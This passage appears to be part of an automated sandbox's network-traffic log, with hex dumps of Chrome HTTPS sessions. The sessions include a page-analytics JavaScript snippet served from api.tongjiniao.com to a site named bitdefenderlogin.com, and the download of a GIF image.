                                                                                                                                                          2024-06-09 22:40:45 UTC16384INData Raw: 2b 9b 1c a9 58 ee 79 79 92 d8 7d 57 5f 73 7c 16 de 95 a4 f0 a2 aa 6c 13 5e ed da 9f 52 46 78 7f c4 4e ba 9a 99 bc 31 b4 e4 ee 6e 45 6e b5 96 84 69 c8 28 12 d4 69 5e e7 39 c3 fb 99 34 99 f7 81 03 27 d2 7b 4f 9a 24 f3 ae a2 6d 43 e2 51 91 40 7a 88 28 19 b8 4b 4a ec 4a 97 de 54 cf c9 f4 ba 96 28 fb 70 88 af 06 09 06 a0 78 c5 2f ce 77 e0 e8 44 d7 23 49 b2 48 8c dc bb 96 00 fe 24 3b 76 dd c9 53 f7 c9 24 71 bc 67 8d 5f 76 50 7a be 3b 65 58 59 69 2f 1c 52 36 86 94 0c 1d c9 97 24 59 d6 19 d0 7b 46 e6 a4 0f ef e8 c8 2e ba 8d ac fd 29 2b f3 43 48 ad b7 e0 35 a2 2a 8c d9 d7 44 96 55 1f dc d8 5e 79 12 ad 33 fc 60 5d 97 3b 82 e3 2e 5b 8f 80 16 17 39 ed c7 68 bd 38 b7 2d 29 ce 24 6a 6f 09 88 09 96 e7 e2 7b 24 b5 0d ee c7 33 3a 7d 6f 87 7f 64 22 24 42 02 ff 01 78 d7 f7
                                                                                                                                                          Data Ascii: +Xyy}W_s|l^RFxN1nEni(i^94'{O$mCQ@z(KJJT(px/wD#IH$;vS$qg_vPz;eXYi/R6$Y{F.)+CH5*DU^y3`];.[9h8-)$jo{$3:}od"$Bx
                                                                                                                                                          2024-06-09 22:40:45 UTC16384INData Raw: 4e 5e ab f5 19 5c eb b7 b8 96 b9 56 c8 43 17 7d 74 d2 ef 9c fc f4 f1 08 05 4b 07 1c e4 68 4e de 2c 72 a3 59 5e 9b b7 96 f7 9f cf c1 8d b2 97 5b 66 19 c6 ca 64 66 11 7e f7 de 67 71 f2 96 5b 1c 4a 06 f9 5e a0 44 3e 79 26 b3 c9 06 a2 e5 6f 11 86 28 e1 b3 b9 5e d5 5e 84 99 e5 9a e6 bd ec 65 96 5b 92 91 28 f8 59 cc 17 3f a2 61 7e 7f 88 7c 90 91 df be 1f 61 90 27 13 fd f9 a1 4c 26 1b 69 8c 7f 34 fc 87 24 43 1a 00 ec 47 2f 06 a8 2a d4 25 30 36 49 e0 4a 57 60 85 84 ae 20 01 15 57 90 c3 ca ba 62 41 b5 e8 a3 0d 72 50 82 c3 04 07 ff 31 ce e9 83 6b 1a 02 dd 93 92 c1 0f 7e 00 83 25 de 53 46 fe 24 72 0b 14 f2 23 4a 30 44 a1 fa 88 d2 0b 60 f0 03 19 cd 9b 05 0a a1 d7 10 1b b6 24 86 4f e9 05 2d 74 48 c0 1e f2 83 16 44 c9 21 3f fc 17 27 23 ca d0 21 d2 a0 45 15 ad 58 45 f7
                                                                                                                                                          Data Ascii: N^\VC}tKhN,rY^[fdf~gq[J^D>y&o(^^e[(Y?a~|a'L&i4$CG/*%06IJW` WbArP1k~%SF$r#J0D`$O-tHD!?'#!EXE
                                                                                                                                                          2024-06-09 22:40:45 UTC16384INData Raw: 71 c7 b6 89 c9 6d 03 e8 38 03 53 50 02 ca b6 ec cb f6 09 6d 2a 9b 47 24 a5 9a 3a e4 ce fb ed a6 e6 9a fe c4 38 76 c4 06 95 c9 23 94 55 35 e2 8e e9 1d dd ac d1 f6 d9 ee c9 53 ff 64 88 31 b3 ba b6 a1 1a 98 1a 71 df 51 e9 6d 12 a1 ff dc a1 22 81 49 9d 1f 52 1d 96 7c 60 a2 5b 56 3f 3e 22 0c bb 2f 0a bb 17 4e ad a1 a7 76 bf 25 5f e4 10 1a a1 a0 ba 1c 89 14 a3 5c 18 74 36 8c 6b 42 37 74 34 2c a9 42 bf 55 31 c4 e9 34 6a 74 8f 7a f4 d9 c3 dd 5b 66 6a 91 9d 1a 09 fd a6 3b 53 97 3d dd 20 25 af ed e9 fc e7 af 3d 2e e9 21 4c 87 b0 aa 44 52 1d 2a 32 b0 01 6c d0 ab a3 a2 84 61 5b 0b 32 9b 75 12 aa de ea 29 6b c0 a3 5a c8 1d 5e 77 64 46 cf 05 47 c7 d6 8f 92 f4 33 24 65 4b d7 74 4c 87 89 1b 3f 88 53 2c dc 84 08 81 1f d9 36 56 30 ec 18 7f 76 c3 66 e1 66 c7 09 1d 96 81 51
                                                                                                                                                          Data Ascii: qm8SPm*G$:8v#U5Sd1qQm"IR|`[V?>"/Nv%_\t6kB7t4,BU14jtz[fj;S= %=.!LDR*2la[2u)kZ^wdFG3$eKtL?S,6V0vffQ
                                                                                                                                                          2024-06-09 22:40:46 UTC16384INData Raw: 3c 97 c7 2f a1 75 9c 3f 32 2a 28 93 f7 c8 74 84 55 72 dd 89 66 98 34 f9 53 5a 75 15 2d 76 1c aa ce dd 62 86 53 9e 24 5d 7d 17 c9 9f 79 19 cc 37 2a 1a 07 cb 6c d7 bb 0a 52 bc 49 8a 6b d5 5c f4 a9 bf f6 6a 47 70 14 06 ba f5 cb 12 09 4f af dd 76 ce 09 9e bb 57 c4 46 cf 99 d1 b8 d4 9f b8 c4 64 6f cf 1e 31 4c 84 16 49 87 5d 82 e9 c8 d2 db a5 0f 0b d3 49 24 3a 3f 16 87 04 c6 24 52 87 40 de f9 2a 57 5b 9c 3a 3a 01 f3 48 18 69 23 65 94 84 9f df 75 89 c6 51 02 72 19 fd 98 24 30 ff 14 92 e6 3c 08 2b 9b 1c a9 58 ee 79 79 92 d8 7d 57 5f 73 7c 16 de 95 a4 f0 a2 aa 6c 13 5e ed da 9f 52 46 78 7f c4 4e ba 9a 99 bc 31 b4 e4 ee 6e 45 6e b5 96 84 69 c8 28 12 d4 69 5e e7 39 c3 fb 99 34 99 f7 81 03 27 d2 7b 4f 9a 24 f3 ae a2 6d 43 e2 51 91 40 7a 88 28 19 b8 4b 4a ec 4a 97 de
                                                                                                                                                          Data Ascii: </u?2*(tUrf4SZu-vbS$]}y7*lRIk\jGpOvWFdo1LI]I$:?$R@*W[::Hi#euQr$0<+Xyy}W_s|l^RFxN1nEni(i^94'{O$mCQ@z(KJJ
                                                                                                                                                          2024-06-09 22:40:46 UTC16384INData Raw: 79 4f 30 65 40 09 16 4e f2 aa 7e a2 e8 58 60 90 43 16 79 64 92 f1 2c f8 e4 40 0b 29 c4 35 f5 e0 aa 58 5e 39 be 18 f0 0b 88 29 18 f0 87 8a 65 ce 4d 02 85 93 64 cf 63 8f 4b 16 7a 68 a2 8b 36 ba 25 94 93 3e f3 e0 b1 5e 76 ba 89 23 d5 c0 f9 e5 33 98 c8 ff 0d 5e 79 25 ce 6d ea 13 74 7e eb 0c 79 a1 86 31 8a 5e a2 30 1b e8 a3 d3 56 7b 6d b6 c3 55 fa 6d 20 89 20 62 ac 0d fe a9 7b 03 bc 37 18 65 0a 37 99 90 c2 69 1a de c2 3a e2 9b 73 c6 38 ec 35 cf fe b8 6d c6 1b 77 fc 71 52 e1 96 3c 45 72 70 78 4e 5e ab f5 19 5c eb b7 b8 96 b9 56 c8 43 17 7d 74 d2 ef 9c fc f4 f1 08 05 4b 07 1c e4 68 4e de 2c 72 a3 59 5e 9b b7 96 f7 9f cf c1 8d b2 97 5b 66 19 c6 ca 64 66 11 7e f7 de 67 71 f2 96 5b 1c 4a 06 f9 5e a0 44 3e 79 26 b3 c9 06 a2 e5 6f 11 86 28 e1 b3 b9 5e d5 5e 84 99 e5
                                                                                                                                                          Data Ascii: yO0e@N~X`Cyd,@)5X^9)eMdcKzh6%>^v#3^y%mt~y1^0V{mUm b{7e7i:s85mwqR<ErpxN^\VC}tKhN,rY^[fdf~gq[J^D>y&o(^^
                                                                                                                                                          2024-06-09 22:40:46 UTC16384INData Raw: 4c 2d 2a 41 56 69 d2 01 5f 9f c2 3a 2e 0e 99 fb 0a 86 18 7c b2 96 41 d8 81 39 bb 62 60 39 44 0b 29 ed e6 ee 30 e2 cc e7 ab 06 ed 7a be 6d 60 88 f1 2e 6f 63 13 42 bc b1 24 bd 9e c7 a2 da 97 d8 a1 a7 fa 62 86 1d 62 5e 79 49 de 43 05 63 7f f2 3a 77 29 aa 61 7c 88 3f c2 9e 5c 26 b8 82 bd ba 91 63 db 60 48 bf 73 89 37 9f 0d 4c e1 f5 87 9a 52 9c d6 3b 70 7f 48 6f 98 5b ef 0b 57 29 f5 d6 a2 f3 de 4f 5b 7b 6f d8 2e 2b c7 4e 02 30 78 40 75 35 90 ec d8 0a 35 60 83 53 24 01 12 48 57 c6 0e 9f 2c 4d 71 c7 b6 89 c9 6d 03 e8 38 03 53 50 02 ca b6 ec cb f6 09 6d 2a 9b 47 24 a5 9a 3a e4 ce fb ed a6 e6 9a fe c4 38 76 c4 06 95 c9 23 94 55 35 e2 8e e9 1d dd ac d1 f6 d9 ee c9 53 ff 64 88 31 b3 ba b6 a1 1a 98 1a 71 df 51 e9 6d 12 a1 ff dc a1 22 81 49 9d 1f 52 1d 96 7c 60 a2 5b
                                                                                                                                                          Data Ascii: L-*AVi_:.|A9b`9D)0zm`.ocB$bb^yICc:w)a|?\&c`Hs7LR;pHo[W)O[{o.+N0x@u55`S$HW,Mqm8SPm*G$:8v#U5Sd1qQm"IR|`[
                                                                                                                                                          2024-06-09 22:40:46 UTC16384INData Raw: af 03 71 06 8e 9b 88 15 b3 cd 82 99 fc c8 86 68 3d 1c 30 83 0c 43 c9 14 f5 08 7a b9 09 db 9a 38 b8 6a 18 46 9f 40 46 2b 10 7a 6a 56 7b 03 13 ee 72 1b a2 b6 5d 5a 18 78 b3 18 86 40 1e bc ab 7f 94 0e ff b8 1a f3 65 cd e4 55 a0 bd 6d 37 a2 4d 8a 25 88 81 a7 22 df 2e 17 31 d7 e4 71 84 12 cb 63 16 1f b1 1a 31 be 61 24 ff 81 49 7f 20 1a a5 37 34 c6 fd 74 d6 0f fa 3a 07 09 06 c0 6f 7e f7 cb 69 e0 f4 b7 6a cd 33 ee d8 a0 46 52 01 9b 8d c0 13 06 49 36 e0 2a d6 71 5d 43 8d 1f 64 30 3f f6 7c ea b2 52 d8 ae 12 e4 a5 5a a3 c6 e1 b6 92 b0 74 c6 43 ab bb d2 b8 b9 6f 3d b5 73 f2 aa e1 0b 79 f7 11 97 c6 f8 23 47 74 06 48 1a fd 63 8f e4 58 9a 1e f1 f1 8e a5 dd 6c 7f 5a 1b 87 d8 ee 87 b6 af 62 b6 6b b4 8e 6e 66 85 9a e0 3c 22 0c 5b 0d 24 ca fd 98 32 35 b6 49 63 57 41 08 8d
                                                                                                                                                          Data Ascii: qh=0Cz8jF@F+zjV{r]Zx@eUm7M%".1qc1a$I 74t:o~ij3FRI6*q]Cd0?|RZtCo=sy#GtHcXlZbknf<"[$25IcWA
                                                                                                                                                          2024-06-09 22:40:46 UTC16384INData Raw: ff 98 73 b8 5a b0 01 a6 0d d9 d5 88 14 b7 5a 73 06 b1 ac 65 67 b7 26 be 3c 1d 67 af 07 d4 89 08 7a 78 16 5b 6c 7c 57 31 44 b1 c5 eb 12 fe 88 45 00 2c 12 b0 83 9a f0 98 97 d0 3c 67 3c 95 c4 70 c6 53 ff fb 87 c3 73 0c fe 39 43 11 f3 a9 04 f9 b3 c7 bb c5 c8 fb 0b 2f a4 ce e4 f9 4d ed cc a5 9f cc 9c 50 17 48 d6 90 bd 18 5d bd 2a f4 d4 e5 fc 8f 36 fd d7 96 4a 5d ce 00 4f eb f9 b0 c5 a0 d3 d8 25 51 46 05 72 f4 53 b9 bb 7a 12 0f f1 2d 05 a1 d0 45 fa d0 98 5d 16 89 dc 34 d3 40 99 4d a3 ba 52 43 30 58 04 c4 31 5d 35 bf 80 9a 95 8c c6 59 2c 94 24 e1 52 3d 37 9d 74 d7 b7 cc a9 9f 80 5b 70 9c 05 3b ee 68 73 d7 b3 86 50 77 2f b6 60 0d 25 25 ba e6 53 9f 50 74 67 65 c9 8d ba c5 b0 43 e4 97 61 79 b0 c7 6d b5 02 eb 53 cc ad 44 0a e6 7d 82 3d 68 f5 12 d5 11 5d 50 c1 40 94
                                                                                                                                                          Data Ascii: sZZseg&<gzx[l|W1DE,<g<pSs9C/MPH]*6J]O%QFrSz-E]4@MRC0X1]5Y,$R=7t[p;hsPw/`%%SPtgeCaymSD}=h]P@


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          81192.168.2.549810110.42.7.1144434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:44 UTC417OUTGET /c?_=600260993449164800 HTTP/1.1
                                                                                                                                                          Host: api.tongjiniao.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:45 UTC475INHTTP/1.1 200 OK
                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                          Access-Control-Allow-Headers: DNT,Keep-Alive,User-Agent,Cache-Control,Content-Type,Authorization
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cache-Control: no-cache,no-store
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:44 GMT
                                                                                                                                                          Server: nginx
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          cache_hit: nocache
                                                                                                                                                          wb_list: not_in_list
                                                                                                                                                          Connection: close
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          2024-06-09 22:40:45 UTC2372INData Raw: 32 61 36 32 0d 0a 21 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 74 6a 6e 20 3d 20 7b 0d 0a 20 20 20 20 20 20 20 20 69 6e 69 74 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 74 61 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 73 63 72 69 70 74 27 29 0d 0a 76 61 72 20 6c 65 6e 20 3d 20 73 74 61 67 2e 6c 65 6e 67 74 68 0d 0a 76 61 72 20 69 73 52 65 70 65 61 74 20 3d 20 30 0d 0a 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 73 74 61 67 5b 69 5d 2e 73 72 63 2e 69 6e 64 65 78 4f 66 28 27 36 30 30 32 36 30 39 39 33 34 34 39 31 36 34 38 30 30 27
                                                                                                                                                          Data Ascii: 2a62!(function () { var tjn = { init: function () { var stag = document.getElementsByTagName('script')var len = stag.lengthvar isRepeat = 0for (var i = 0; i < len; i++) { if (stag[i].src.indexOf('600260993449164800'
                                                                                                                                                          2024-06-09 22:40:45 UTC1724INData Raw: 21 73 69 64 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 73 69 64 20 3d 20 76 3b 0d 0a 20 20 20 20 20 20 20 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6b 2c 20 76 29 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 73 69 64 20 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 6e 75 6c 6c 20 3a 20 73 69 64 3b 0d 0a 7d 2c 0d 0a 70 63 3a 20 66 75 6e 63 74 69 6f 6e 20 28 6b 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 21 6b 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6b 20 3d 20 27 73 74 5f 65 39 66 63 36 65 66 35 32 64 31 30 62 32 62 34 38 34 63 36 37 33 66 65 65 36 33 36 32 39 37 31 27 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 76 20 3d 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6b 29 2c 0d 0a
                                                                                                                                                          Data Ascii: !sid) { sid = v; sessionStorage.setItem(k, v); } return sid == 'undefined' ? null : sid;},pc: function (k) { if (!k) { k = 'st_e9fc6ef52d10b2b484c673fee6362971' } var v = sessionStorage.getItem(k),
                                                                                                                                                          2024-06-09 22:40:45 UTC4744INData Raw: 66 20 28 76 29 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 76 61 72 20 75 73 65 72 41 67 65 6e 74 49 6e 66 6f 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0d 0a 20 20 20 20 76 61 72 20 6f 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 70 6c 61 74 66 6f 72 6d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0d 0a 20 20 20 20 76 61 72 20 69 73 4d 61 63 20 3d 20 6f 2e 69 6e 64 65 78 4f 66 28 27 6d 61 63 69 6e 74 65 6c 27 29 20 21 3d 3d 20 2d 31 3b 0d 0a 20 20 20 20 76 61 72 20 69 73 50 63 20 3d 20 28 28 6f 2e 69 6e 64 65 78 4f 66 28 22 77 69 6e 33 32 22 29 20 3d 3d 20 2d 31 20 26 26 20 21 69 73 4d 61 63 29 20 7c 7c 20 6f 2e 69 6e 64 65 78 4f 66 28 22 69
                                                                                                                                                          Data Ascii: f (v) !== "undefined"; } var userAgentInfo = navigator.userAgent.toLowerCase(); var o = navigator.platform.toLowerCase(); var isMac = o.indexOf('macintel') !== -1; var isPc = ((o.indexOf("win32") == -1 && !isMac) || o.indexOf("i
                                                                                                                                                          2024-06-09 22:40:45 UTC2016INData Raw: 20 20 63 72 65 61 74 65 58 48 52 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6c 65 74 20 78 68 72 20 3d 20 6e 75 6c 6c 3b 0d 0a 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 20 21 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 0d 0a 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 74 79 70 65 6f 66 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 20 21 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 61 67 72 65 65 6d 65 6e 74 2e 63 61 6c 6c 65 65 2e 61 63 74 69 76 65 58 53 74 72 69 6e 67 20 21 3d 20 27 73 74 72 69 6e 67 27 29 20 7b 0d 0a
                                                                                                                                                          Data Ascii: createXHR: function () { let xhr = null; if (typeof XMLHttpRequest != 'undefined') { xhr = new XMLHttpRequest() } else if (typeof ActiveXObject != 'undefined') { if (typeof agreement.callee.activeXString != 'string') {
                                                                                                                                                          2024-06-09 22:40:45 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-06-09 22:40:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          82192.168.2.549815103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:45 UTC384OUTGET /uploads/d9a8a9dffbb7ab07051ddea5260b8132.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:45 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:45 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 239435
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:25:36 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bfb0-3a74b"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:45 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:45 UTC16036INData Raw: 47 49 46 38 39 61 e8 03 64 00 f7 ff 00 77 09 03 d0 b1 0d 00 ff 52 a5 98 98 fb f5 cf fd eb 73 8e 2a 10 00 04 ff a2 9d f7 d6 ab 53 fa ef b4 ca 77 25 cc 94 0e 21 ff f7 af 6f 0b d6 ae 2b f1 d4 93 fb ea 01 fd 66 02 8e 50 10 ee 05 00 f7 94 6b cd 95 4c 73 d6 00 95 49 24 fe d7 d6 83 12 08 da b7 65 b9 8a 0d e8 2a 31 ab 4e 15 fa ec 2b ce 08 00 ff aa aa ac e6 9c fc fc f9 a7 57 25 d0 71 0b d4 d4 fc e9 b8 4d f8 8a 05 76 46 13 b4 8b 4a 1c 13 64 ab a7 09 68 34 11 fa ec 4e ff c8 00 ac 04 04 b7 89 29 db 14 12 fd a6 02 f8 be 93 51 27 0f d6 cd 04 b2 74 48 95 69 0e fd cb 45 ff 97 97 ff 67 67 e7 21 10 d6 f7 d6 4b 0d 08 ec 97 23 ff 00 ad 72 6a ff aa 17 21 ec db af cc b3 90 90 69 2b 25 24 24 ff ee 85 fd dd 63 f6 aa 7b 8f 35 23 f6 51 09 84 d6 6c 1e 9f e4 fd da 00 fe d6 56 ff f8
                                                                                                                                                          Data Ascii: GIF89adwRs*Sw%!o+fPkLsI$e*1N+W%qMvFJdh4N)Q'tHiEgg!K#rj!i+%$$c{5#QlV
                                                                                                                                                          2024-06-09 22:40:45 UTC16384INData Raw: 83 0a f4 94 0a 0c c0 16 c4 15 03 38 40 fa 1c 42 25 64 02 04 64 82 2d 7c c1 00 c8 81 03 70 40 21 6c 01 23 a8 c1 03 38 c0 09 10 01 03 c2 02 3f bc 41 18 d4 01 15 ec 4f 00 7c 40 b3 8c 40 dc d5 08 01 20 81 0b b8 00 d1 39 15 03 14 02 71 be 1d 5c 99 42 01 9c 81 58 3c c0 23 30 40 0a 94 41 0d 99 82 20 70 40 19 4c 02 09 f8 a9 03 a4 40 0a 30 40 53 28 00 04 94 a0 20 94 c0 26 70 00 03 c4 00 79 8e 9a 12 30 40 19 a6 a7 a9 9e 2a aa 8e e4 b5 b1 67 ea bd 67 77 75 9b eb 9d c7 ee e1 07 de d4 de 4a 8a 07 ed 09 62 51 f6 a4 80 06 28 7b 38 81 1e 36 a8 ab e2 92 7f 02 88 22 3a a8 24 42 65 85 0c 49 53 96 9f bf 5d 93 e6 98 e5 c0 a1 25 90 60 a8 87 04 c1 32 58 25 e2 44 83 55 86 5f 2a 46 4e 87 98 a8 3d a1 e8 89 16 1f 8b fa 83 2c e6 03 5d 4a cf ba 72 88 91 b2 ce 60 d6 68 a2 7c 9c 5b ea
                                                                                                                                                          Data Ascii: 8@B%dd-|p@!l#8?AO|@@ 9q\BX<#0@A p@L@0@S( &py0@*ggwuJbQ({86":$BeIS]%`2X%DU_*FN=,]Jr`h|[
                                                                                                                                                          2024-06-09 22:40:45 UTC16384INData Raw: 80 33 f8 6a 90 a9 59 1f 8b 24 c2 92 7f 41 8d 09 18 b3 cf 3e 06 76 76 58 e1 2b 07 07 1b 18 2b 73 a6 ba 4a 1e 25 f1 9c bc eb 7a 2a 8b 69 56 56 9d 55 1a 8a 17 60 95 2a 11 71 ae 73 b5 ad 9d d8 2c e0 39 60 7a 0e 18 f6 8e 78 2e 9d aa 27 d0 52 62 82 08 08 7d 9d 9a 42 5a 3b 15 ae e9 87 c1 13 11 0c 7f 0f b4 ea c9 02 58 1c 48 63 00 ba 8f b9 9a c6 5f 8c 35 e2 69 7d 0b d9 d4 a0 da 08 ff a9 4b 5d 92 7a 04 c5 64 33 71 f5 50 81 32 83 58 3b 2b 9e bd 7e 0b 93 3b 77 aa d3 04 12 46 3a 23 ab e8 d8 50 8d 98 45 43 75 69 be 32 41 89 bd 65 b5 48 eb 69 a2 cb d1 6a 34 19 a1 69 df f7 da 33 a7 39 47 71 a0 6d 80 71 1b 60 d8 4b d7 6a 55 0a b6 34 8d bb 3a 05 5b b7 4b 3d bc 36 07 c7 db a5 9b 7d b7 94 70 00 16 39 c6 36 a8 98 fe 14 bf 1b 0e f0 13 e7 c4 aa 04 2f b8 34 33 02 ce 05 69 8a e1
                                                                                                                                                          Data Ascii: 3jY$A>vvX++sJ%z*iVVU`*qs,9`zx.'Rb}BZ;XHc_5i}K]zd3qP2X;+~;wF:#PECui2AeHij4i39Gqmq`KjU4:[K=6}p96/43i
                                                                                                                                                          2024-06-09 22:40:46 UTC16384INData Raw: 39 13 a2 73 04 3b 79 53 08 ce 7e c2 db 53 bd f4 88 03 34 51 82 0b 36 f8 60 84 13 5d 54 d3 b8 88 42 55 ae 57 5d 3d ca 52 7d 3e 69 98 e1 ff f4 09 95 c3 4f 37 f6 58 ac 51 79 2a 11 a9 12 01 5c 18 53 7f b0 59 14 46 1d 4d 0b d2 d6 64 7b 04 ec d9 1d 99 cd 0f 47 1d 83 1c b2 2f 68 3f 42 a0 e7 8e 7e 2e 69 ca d9 6e a5 31 08 13 92 56 5a 69 67 5d 5b 7a e9 23 67 8d f1 00 6d b7 45 ff a8 5b 7a 15 e2 32 dc 7a 71 2b d7 dc 86 d0 a5 6e 6b 87 f4 ec e1 ec 1e ba 86 08 de 81 c4 9d 37 60 88 e0 f4 73 4e 7d 11 fa 9a 20 80 e1 c6 3a 4e eb 06 4e f8 6f c0 03 17 7c 70 93 16 2e ea e2 fe 10 2f d1 40 a6 28 16 11 ab 4d 35 fe 78 ac 8e 27 b7 3c 64 9d 22 c0 46 2c 27 4a 36 7c c0 53 57 8e f5 34 a9 91 8d f6 2f 9d 65 9e f9 c9 63 0f b0 19 bf 5c 95 e5 4b e7 c6 5e ff 68 04 d1 06 bb 15 01 a9 8d 1e 69
                                                                                                                                                          Data Ascii: 9s;yS~S4Q6`]TBUW]=R}>iO7XQy*\SYFMd{G/h?B~.in1VZig][z#gmE[z2zq+nk7`sN} :NNo|p./@(M5x'<d"F,'J6|SW4/ec\K^hi
                                                                                                                                                          2024-06-09 22:40:46 UTC16384INData Raw: 6b e9 1c 54 15 0d 5a 9b be d3 38 48 8c 84 9b ef fb 71 d7 5a 98 8b 99 76 04 56 bf 78 2b 02 65 15 45 8a 09 3a d7 29 3a c1 89 3e 4f 8c 9d a4 1a 4b 2a fb 4f bb 3b c0 f3 51 c0 14 c2 c0 bb aa 24 82 4b 82 c3 f7 c0 5c 64 af 65 7c 21 14 ec 0f d0 67 21 c7 27 40 06 c2 c1 fa 90 a6 59 39 b8 da 5b b0 22 8c 27 d6 c1 ac 34 e1 7d 46 ea 54 3b d1 78 e1 7b c3 e8 97 96 ae 69 c3 ff b9 b1 fc d6 b5 38 ff ac be 49 1a 13 4b 15 c4 ea 21 4a b5 3b 61 44 5c 61 eb 38 02 da 30 3a ce 59 aa 61 38 7b dd 8a c4 5f e6 b2 bd ab 93 0a 96 71 53 1c 3a 79 45 c0 61 8a 24 e0 26 4c b3 66 24 ef e9 c5 ce 67 20 64 5c af d0 4b 21 6d 6c 82 02 7b 21 28 f8 3f 35 0b c7 f1 96 bd 17 b2 bd 77 bc 1b 79 fc 13 7c 0c 14 7e ac 13 80 7c 96 92 d8 9f 85 5c c3 35 bc 1c e6 5b 13 26 d0 be 5f fb 92 3f ec be 4a 9a 7a 34 34
                                                                                                                                                          Data Ascii: kTZ8HqZvVx+eE:):>OK*O;Q$K\de|!g!'@Y9["'4}FT;x{i8IK!J;aD\a80:Ya8{_qS:yEa$&Lf$g d\K!ml{!(?5wy|~|\5[&_?Jz44
